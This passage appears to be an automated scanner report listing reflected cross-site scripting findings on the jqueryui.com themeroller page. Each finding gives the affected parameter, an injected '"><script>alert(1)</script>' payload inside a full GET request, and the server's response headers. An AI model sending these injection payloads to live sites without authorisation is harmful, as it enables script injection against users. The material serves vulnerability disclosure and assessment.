This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65f926f"><script>alert(1)</script>a58c2e437c9&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc9a"><script>alert(1)</script>680b4cdc57f was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10afc9a"><script>alert(1)</script>680b4cdc57f&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dc63"><script>alert(1)</script>f34b1579462 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=756dc63"><script>alert(1)</script>f34b1579462&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1716"><script>alert(1)</script>fd52dd1f0c5 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95a1716"><script>alert(1)</script>fd52dd1f0c5&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ee4"><script>alert(1)</script>ef5a1a6a4b6 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50a7ee4"><script>alert(1)</script>ef5a1a6a4b6&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dad5"><script>alert(1)</script>e93306ce4ce was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=559dad5"><script>alert(1)</script>e93306ce4ce&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85739"><script>alert(1)</script>9382c055b11 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=7585739"><script>alert(1)</script>9382c055b11&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30d95"><script>alert(1)</script>efdfe5adaa9 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=030d95"><script>alert(1)</script>efdfe5adaa9&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 684ec"><script>alert(1)</script>f4d49959a0 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0684ec"><script>alert(1)</script>f4d49959a0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120092
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35da4"><script>alert(1)</script>0aa069f8a2 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png35da4"><script>alert(1)</script>0aa069f8a2&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120027
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d62a"><script>alert(1)</script>d9e2e119da was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png9d62a"><script>alert(1)</script>d9e2e119da&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120027
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887dc"><script>alert(1)</script>2ff81d14d74 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png887dc"><script>alert(1)</script>2ff81d14d74&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120029
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20719"><script>alert(1)</script>34a4ccee6e7 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png20719"><script>alert(1)</script>34a4ccee6e7&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120029
